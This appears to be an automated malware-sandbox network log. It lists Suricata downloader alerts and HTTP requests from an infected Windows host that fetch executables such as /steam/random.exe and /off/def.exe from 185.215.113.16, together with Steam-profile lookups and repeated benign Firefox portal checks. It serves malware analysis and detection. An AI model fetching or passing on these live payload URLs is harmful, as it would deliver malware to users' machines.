Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49930 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.7:49837 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49990 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49993 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49995 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.7:49995 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.7:50039 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.7:50095 -> 185.215.113.16:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
